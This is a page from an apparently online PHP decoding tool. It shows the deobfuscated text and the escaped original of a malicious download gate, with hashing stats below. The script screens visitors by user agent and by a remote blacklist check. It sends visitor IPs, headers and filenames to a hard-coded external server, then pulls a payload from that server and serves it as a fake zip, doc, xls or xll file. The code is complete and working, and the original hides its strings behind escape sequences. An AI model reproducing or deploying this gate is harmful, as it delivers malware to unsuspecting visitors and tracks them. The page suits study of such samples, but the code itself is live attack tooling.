Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto bSbzE; Qa6Vp: $ip_for_check = getRealIpAddr(); goto SzUot; vXyMa: if (emp..
Decoded Output download
<?php
goto bSbzE;
Qa6Vp:
$ip_for_check = getRealIpAddr();
goto SzUot;
vXyMa:
if (empty($REQUEST_URI)) {
die('');
}
goto AA3TG;
NWtPB:
if (!$is_HH) {
if ($_GET["e"] != $REDIRECT_FILENAME . "." . $file_ext) {
$_SESSION["__redirect_was_start"] = true;
$_SESSION["doc_name"] = $_GET["e"];
if (stripos($_SESSION["doc_name"], "." . $file_ext) === false) {
$_SESSION["doc_name"] .= "." . $file_ext;
}
$_SESSION["file_ext"] = $file_ext;
$redirect_uri = str_replace($_GET["e"], $REDIRECT_FILENAME . "." . $file_ext, $REQUEST_URI);
$random_name_id = generateRandomString(rand(2, 8));
echo "<html><body>";
echo "<span id="" . $random_name_id . "" data-" . $random_name_id . "="" . $redirect_uri . ""></span>";
echo "<script>";
echo "location.pathname = document.getElementById('" . $random_name_id . "').getAttribute('data-" . $random_name_id . "');";
echo "</script>";
echo "</body></html>";
die;
}
}
goto K3RRS;
DSAwk:
if (stripos($REQUEST_URI, "logotype.jpg") !== false) {
$_SESSION["has_logo"] = true;
die;
}
goto vXyMa;
AvUru:
$is_black = false;
goto VYyET;
yGi1s:
if (stripos($_SERVER["HTTP_USER_AGENT"], "Windows") === false) {
die('');
}
goto uXeVK;
AA3TG:
$REQUEST_URI_ARR = explode("/", $REQUEST_URI);
goto CmTT3;
wnFmb:
shuffle($links);
goto YJ2_I;
mFD1k:
foreach ($hdrs as $key => $value) {
$kk = strtolower($key);
$hdrs_new[$kk] = $value;
}
goto knt5D;
FnDiP:
if ($is_black) {
die('');
}
goto NWtPB;
IjqmZ:
if (!in_array($file_ext, array("zip", "xls", "doc", "xll"))) {
$file_ext = "zip";
}
goto zGMSH;
X4Ae2:
$REDIRECT_FILENAME = "charts";
goto G4Ia6;
ddvCb:
ini_set("display_startup_errors", 0);
goto jp9u9;
ouQ1T:
$data_json = json_encode($data_json);
goto yVIJJ;
oFBbs:
$VERSION = "2.1.4356457345";
goto X4Ae2;
bSbzE:
ini_set("display_errors", 0);
goto ddvCb;
yVIJJ:
$data_json = base64_encode($data_json);
goto Qa6Vp;
e2ydP:
if (empty($_SESSION["doc_name"])) {
$_SESSION["doc_name"] = $REDIRECT_FILENAME . "." . $file_ext;
}
goto WGwa0;
XgIvQ:
function generateRandomString($length = 10)
{
$characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString;
}
goto oFBbs;
mKQxc:
$hdrs_new = array();
goto z0i04;
IVZAu:
$REQUEST_URI = $_SERVER["REQUEST_URI"];
goto DSAwk;
jp9u9:
error_reporting(E_ALL);
goto XgIvQ;
YJ2_I:
$outfilepath = __DIR__ . "/../big__stat.txt";
goto e2ydP;
zuwOG:
$file_ext = end($file_ext);
goto IjqmZ;
zGMSH:
$data_json = array("ip" => getRealIpAddr(), "time" => time(), "hh" => $hdrs_new["hh"], "ext" => $file_ext, "host" => $_SERVER["SERVER_NAME"], "filename" => $_GET["e"]);
goto ouQ1T;
K3RRS:
if (empty($_SESSION["file_ext"])) {
$_SESSION["file_ext"] = "zip";
}
goto OrlZf;
t2b6d:
foreach ($links_ip_ckeck as $link_ip_ckeck) {
$ctx = stream_context_create(array("http" => array("timeout" => 10)));
$tmp_resp = @file_get_contents($link_ip_ckeck, false, $ctx);
$tmp_resp_json = json_decode($tmp_resp, true);
if ($tmp_resp_json["status"] === true) {
$is_black = $tmp_resp_json["is_black"];
$REDIRECT_FILENAME = $tmp_resp_json["REDIRECT_FILENAME"];
$is_HH = $tmp_resp_json["is_HH"];
break;
}
}
goto FnDiP;
uXeVK:
function getRealIpAddr()
{
if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
$ip = $_SERVER["HTTP_CLIENT_IP"];
} elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else {
$ip = $_SERVER["REMOTE_ADDR"];
}
return $ip;
}
goto mKQxc;
CmTT3:
if (count($REQUEST_URI_ARR) != 3) {
die('');
}
goto qP9ag;
qP9ag:
$_GET["e"] = $REQUEST_URI_ARR[2];
goto WKnc5;
OrlZf:
if (empty($hdrs_new["hh"]) && $_GET["e"] != $REDIRECT_FILENAME . "." . $file_ext) {
die;
}
goto Hdveo;
VYyET:
$is_HH = false;
goto t2b6d;
SzUot:
$links_ip_ckeck = array("http://176.121.14.111/router_black.php?ip=" . $ip_for_check . "&data=" . $data_json . "&version=" . $VERSION . "&alanpo=" . $hdrs_new["alanpo"], "http://176.121.14.111/router_black.php?ip=" . $ip_for_check . "&data=" . $data_json . "&version=" . $VERSION . "&alanpo=" . $hdrs_new["alanpo"], "http://176.121.14.111/router_black.php?ip=" . $ip_for_check . "&data=" . $data_json . "&version=" . $VERSION . "&alanpo=" . $hdrs_new["alanpo"]);
goto AvUru;
G4Ia6:
if (session_start() === false) {
die('');
}
goto IVZAu;
WKnc5:
if (empty($_SERVER["HTTP_USER_AGENT"])) {
die('');
}
goto yGi1s;
knt5D:
$file_ext = explode(".", $_GET["e"]);
goto zuwOG;
Hdveo:
$links = array("http://176.121.14.111/router08.php?pp=" . $data_json . "&version=" . $VERSION, "http://176.121.14.111/router08.php?pp=" . $data_json . "&version=" . $VERSION, "http://176.121.14.111/router08.php?pp=" . $data_json . "&version=" . $VERSION);
goto wnFmb;
z0i04:
$hdrs = getallheaders();
goto mFD1k;
WGwa0:
foreach ($links as $link) {
$ctx = stream_context_create(array("http" => array("timeout" => 30)));
$data = @file_get_contents($link, false, $ctx);
if ($data == "...." || $data == "...") {
break;
}
if (strlen($data) < 1000) {
continue;
}
header("Content-Description: File Transfer");
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=" . $_SESSION["doc_name"]);
header("Content-Transfer-Encoding: binary");
header("Connection: Keep-Alive");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Pragma: public");
echo $data;
die;
}
?>Did this file decode correctly?
Original Code
<?php
goto bSbzE;
Qa6Vp:
$ip_for_check = getRealIpAddr();
goto SzUot;
vXyMa:
if (empty($REQUEST_URI)) {
die('');
}
goto AA3TG;
NWtPB:
if (!$is_HH) {
if ($_GET["\145"] != $REDIRECT_FILENAME . "\56" . $file_ext) {
$_SESSION["\137\137\162\145\144\x69\162\145\x63\164\137\167\141\x73\x5f\163\164\x61\162\x74"] = true;
$_SESSION["\x64\x6f\143\137\156\141\155\x65"] = $_GET["\145"];
if (stripos($_SESSION["\144\157\143\137\156\x61\155\x65"], "\x2e" . $file_ext) === false) {
$_SESSION["\x64\x6f\143\x5f\x6e\x61\x6d\x65"] .= "\x2e" . $file_ext;
}
$_SESSION["\x66\x69\154\x65\137\145\170\x74"] = $file_ext;
$redirect_uri = str_replace($_GET["\x65"], $REDIRECT_FILENAME . "\56" . $file_ext, $REQUEST_URI);
$random_name_id = generateRandomString(rand(2, 8));
echo "\x3c\x68\164\155\154\76\74\x62\157\x64\171\76";
echo "\74\x73\x70\x61\156\40\x69\144\75\42" . $random_name_id . "\42\40\144\141\164\x61\55" . $random_name_id . "\75\x22" . $redirect_uri . "\42\x3e\74\x2f\x73\x70\141\156\x3e";
echo "\x3c\x73\143\162\151\160\x74\76";
echo "\154\x6f\x63\141\164\151\x6f\156\56\x70\141\164\x68\156\141\155\145\x20\x3d\40\x64\157\x63\165\x6d\145\x6e\164\56\x67\145\164\x45\154\x65\x6d\x65\x6e\x74\x42\x79\x49\144\x28\x27" . $random_name_id . "\x27\51\x2e\x67\145\164\101\x74\x74\162\151\142\165\x74\145\x28\47\x64\x61\164\141\55" . $random_name_id . "\x27\51\73";
echo "\x3c\x2f\163\143\162\x69\160\x74\76";
echo "\x3c\57\142\157\x64\171\x3e\74\x2f\x68\x74\155\154\x3e";
die;
}
}
goto K3RRS;
DSAwk:
if (stripos($REQUEST_URI, "\154\157\147\157\x74\171\x70\145\x2e\152\160\147") !== false) {
$_SESSION["\x68\141\x73\x5f\x6c\157\x67\157"] = true;
die;
}
goto vXyMa;
AvUru:
$is_black = false;
goto VYyET;
yGi1s:
if (stripos($_SERVER["\x48\x54\124\x50\137\125\x53\x45\122\x5f\101\107\x45\x4e\x54"], "\x57\x69\x6e\144\157\167\163") === false) {
die('');
}
goto uXeVK;
AA3TG:
$REQUEST_URI_ARR = explode("\57", $REQUEST_URI);
goto CmTT3;
wnFmb:
shuffle($links);
goto YJ2_I;
mFD1k:
foreach ($hdrs as $key => $value) {
$kk = strtolower($key);
$hdrs_new[$kk] = $value;
}
goto knt5D;
FnDiP:
if ($is_black) {
die('');
}
goto NWtPB;
IjqmZ:
if (!in_array($file_ext, array("\172\x69\x70", "\x78\x6c\x73", "\144\157\143", "\170\154\x6c"))) {
$file_ext = "\x7a\151\x70";
}
goto zGMSH;
X4Ae2:
$REDIRECT_FILENAME = "\143\150\x61\x72\164\163";
goto G4Ia6;
ddvCb:
ini_set("\x64\x69\x73\x70\x6c\141\171\x5f\163\x74\x61\x72\x74\x75\x70\x5f\x65\162\162\157\162\x73", 0);
goto jp9u9;
ouQ1T:
$data_json = json_encode($data_json);
goto yVIJJ;
oFBbs:
$VERSION = "\62\56\x31\x2e\x34\x33\x35\66\x34\65\67\x33\64\x35";
goto X4Ae2;
bSbzE:
ini_set("\144\x69\x73\160\154\x61\x79\x5f\x65\x72\162\x6f\162\x73", 0);
goto ddvCb;
yVIJJ:
$data_json = base64_encode($data_json);
goto Qa6Vp;
e2ydP:
if (empty($_SESSION["\x64\157\x63\137\x6e\x61\x6d\145"])) {
$_SESSION["\x64\x6f\x63\137\x6e\141\155\x65"] = $REDIRECT_FILENAME . "\x2e" . $file_ext;
}
goto WGwa0;
XgIvQ:
function generateRandomString($length = 10)
{
$characters = "\141\x62\143\144\145\146\147\150\151\152\153\x6c\x6d\156\x6f\x70\161\x72\x73\164\x75\x76\167\x78\x79\172\101\x42\x43\104\x45\106\x47\110\x49\112\113\x4c\115\x4e\x4f\120\x51\122\x53\x54\125\126\127\130\x59\132";
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString;
}
goto oFBbs;
mKQxc:
$hdrs_new = array();
goto z0i04;
IVZAu:
$REQUEST_URI = $_SERVER["\122\x45\x51\x55\x45\x53\x54\x5f\125\122\x49"];
goto DSAwk;
jp9u9:
error_reporting(E_ALL);
goto XgIvQ;
YJ2_I:
$outfilepath = __DIR__ . "\57\56\56\57\142\151\x67\x5f\137\x73\x74\141\164\x2e\164\x78\x74";
goto e2ydP;
zuwOG:
$file_ext = end($file_ext);
goto IjqmZ;
zGMSH:
$data_json = array("\x69\160" => getRealIpAddr(), "\x74\x69\155\x65" => time(), "\x68\150" => $hdrs_new["\150\150"], "\145\170\164" => $file_ext, "\150\x6f\x73\164" => $_SERVER["\123\105\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"], "\146\x69\154\x65\156\x61\x6d\145" => $_GET["\145"]);
goto ouQ1T;
K3RRS:
if (empty($_SESSION["\x66\x69\154\x65\x5f\x65\170\x74"])) {
$_SESSION["\x66\151\154\145\137\145\x78\x74"] = "\x7a\x69\160";
}
goto OrlZf;
t2b6d:
foreach ($links_ip_ckeck as $link_ip_ckeck) {
$ctx = stream_context_create(array("\150\164\x74\160" => array("\x74\151\155\x65\157\165\164" => 10)));
$tmp_resp = @file_get_contents($link_ip_ckeck, false, $ctx);
$tmp_resp_json = json_decode($tmp_resp, true);
if ($tmp_resp_json["\163\164\141\164\x75\163"] === true) {
$is_black = $tmp_resp_json["\x69\x73\x5f\142\154\141\x63\x6b"];
$REDIRECT_FILENAME = $tmp_resp_json["\x52\x45\104\x49\122\105\103\124\137\106\111\x4c\x45\x4e\101\x4d\105"];
$is_HH = $tmp_resp_json["\x69\x73\x5f\110\x48"];
break;
}
}
goto FnDiP;
uXeVK:
function getRealIpAddr()
{
if (!empty($_SERVER["\110\124\x54\x50\x5f\103\x4c\x49\105\x4e\124\x5f\111\120"])) {
$ip = $_SERVER["\x48\x54\124\120\x5f\x43\x4c\x49\105\116\x54\x5f\111\x50"];
} elseif (!empty($_SERVER["\110\x54\x54\120\137\x58\x5f\x46\117\122\x57\101\x52\x44\105\104\x5f\x46\117\122"])) {
$ip = $_SERVER["\x48\124\124\120\137\x58\137\106\x4f\x52\127\101\x52\104\x45\x44\137\x46\x4f\x52"];
} else {
$ip = $_SERVER["\122\x45\115\117\124\105\137\101\x44\104\122"];
}
return $ip;
}
goto mKQxc;
CmTT3:
if (count($REQUEST_URI_ARR) != 3) {
die('');
}
goto qP9ag;
qP9ag:
$_GET["\145"] = $REQUEST_URI_ARR[2];
goto WKnc5;
OrlZf:
if (empty($hdrs_new["\x68\150"]) && $_GET["\145"] != $REDIRECT_FILENAME . "\x2e" . $file_ext) {
die;
}
goto Hdveo;
VYyET:
$is_HH = false;
goto t2b6d;
SzUot:
$links_ip_ckeck = array("\x68\x74\164\x70\x3a\x2f\57\x31\x37\66\x2e\x31\x32\61\x2e\61\64\x2e\61\61\x31\57\162\x6f\165\164\145\x72\137\x62\154\141\x63\x6b\x2e\x70\x68\x70\77\151\x70\75" . $ip_for_check . "\x26\144\141\x74\x61\75" . $data_json . "\x26\166\145\162\163\x69\157\x6e\x3d" . $VERSION . "\46\x61\154\x61\156\160\157\x3d" . $hdrs_new["\141\x6c\x61\156\x70\x6f"], "\150\x74\x74\x70\72\x2f\57\x31\67\66\x2e\x31\x32\x31\x2e\61\x34\x2e\x31\61\x31\x2f\x72\157\x75\x74\145\162\x5f\142\154\141\x63\153\56\160\150\x70\x3f\151\160\75" . $ip_for_check . "\x26\x64\x61\164\x61\75" . $data_json . "\x26\x76\145\x72\163\151\x6f\x6e\75" . $VERSION . "\x26\x61\154\141\156\x70\x6f\x3d" . $hdrs_new["\x61\x6c\141\x6e\160\x6f"], "\x68\x74\164\160\x3a\57\x2f\x31\67\x36\x2e\61\62\x31\x2e\x31\64\x2e\x31\61\61\x2f\x72\157\x75\164\145\162\x5f\142\x6c\x61\x63\153\56\160\x68\x70\x3f\151\x70\x3d" . $ip_for_check . "\x26\x64\x61\x74\x61\75" . $data_json . "\46\166\145\162\163\151\x6f\x6e\75" . $VERSION . "\46\141\154\141\x6e\x70\x6f\75" . $hdrs_new["\141\x6c\141\156\160\x6f"]);
goto AvUru;
G4Ia6:
if (session_start() === false) {
die('');
}
goto IVZAu;
WKnc5:
if (empty($_SERVER["\110\x54\124\120\x5f\125\123\x45\122\137\101\x47\x45\x4e\124"])) {
die('');
}
goto yGi1s;
knt5D:
$file_ext = explode("\x2e", $_GET["\145"]);
goto zuwOG;
Hdveo:
$links = array("\150\164\164\x70\72\x2f\x2f\61\x37\66\x2e\61\62\61\x2e\61\x34\56\x31\x31\61\x2f\x72\157\x75\164\145\x72\x30\70\56\x70\150\x70\x3f\x70\x70\x3d" . $data_json . "\x26\x76\x65\x72\x73\151\x6f\156\x3d" . $VERSION, "\150\x74\x74\160\72\57\57\61\67\66\x2e\61\x32\x31\56\x31\64\x2e\x31\x31\x31\x2f\162\157\165\x74\x65\162\60\70\x2e\160\150\x70\x3f\x70\160\x3d" . $data_json . "\46\x76\x65\x72\x73\151\157\156\x3d" . $VERSION, "\x68\164\164\x70\x3a\x2f\57\61\x37\x36\56\x31\x32\61\56\x31\64\56\x31\x31\61\x2f\x72\157\165\164\145\162\60\70\x2e\x70\x68\x70\77\x70\x70\x3d" . $data_json . "\x26\166\x65\x72\x73\151\157\x6e\75" . $VERSION);
goto wnFmb;
z0i04:
$hdrs = getallheaders();
goto mFD1k;
WGwa0:
foreach ($links as $link) {
$ctx = stream_context_create(array("\x68\164\x74\x70" => array("\164\151\x6d\145\x6f\x75\x74" => 30)));
$data = @file_get_contents($link, false, $ctx);
if ($data == "\56\56\x2e\x2e" || $data == "\56\x2e\56") {
break;
}
if (strlen($data) < 1000) {
continue;
}
header("\103\x6f\x6e\164\145\156\164\x2d\104\145\x73\x63\x72\x69\160\164\x69\x6f\156\x3a\x20\x46\151\154\x65\40\x54\x72\x61\156\163\146\145\162");
header("\103\157\156\164\145\x6e\164\55\x54\x79\160\x65\x3a\40\x61\160\x70\154\151\x63\141\x74\151\x6f\x6e\x2f\x6f\143\x74\x65\x74\x2d\163\164\x72\x65\x61\155");
header("\103\157\x6e\x74\x65\x6e\x74\55\104\151\163\160\x6f\x73\151\164\151\157\156\x3a\40\x61\x74\x74\x61\x63\150\x6d\145\156\164\73\40\146\151\x6c\x65\x6e\141\x6d\x65\x3d" . $_SESSION["\x64\157\x63\137\156\x61\x6d\145"]);
header("\x43\x6f\x6e\164\x65\156\x74\55\124\162\x61\x6e\163\x66\145\162\x2d\x45\156\x63\x6f\144\x69\x6e\147\x3a\40\x62\x69\156\x61\162\x79");
header("\x43\157\x6e\x6e\x65\x63\164\151\x6f\156\72\40\x4b\x65\145\160\55\101\154\151\x76\145");
header("\x45\170\x70\x69\x72\x65\163\72\40\60");
header("\x43\141\x63\150\145\55\x43\x6f\x6e\164\x72\x6f\x6c\72\x20\x6d\x75\x73\x74\55\x72\x65\166\141\154\151\x64\x61\164\145\x2c\40\160\157\163\164\55\143\150\145\x63\x6b\x3d\x30\54\40\x70\x72\x65\x2d\143\x68\145\143\x6b\x3d\60");
header("\x50\x72\141\x67\155\141\x3a\40\160\x75\142\154\151\x63");
echo $data;
die;
}
Function Calls
| None |
Stats
| MD5 | 31e2fc09241f370bb621dced11955970 |
| Eval Count | 0 |
| Decode Time | 115 ms |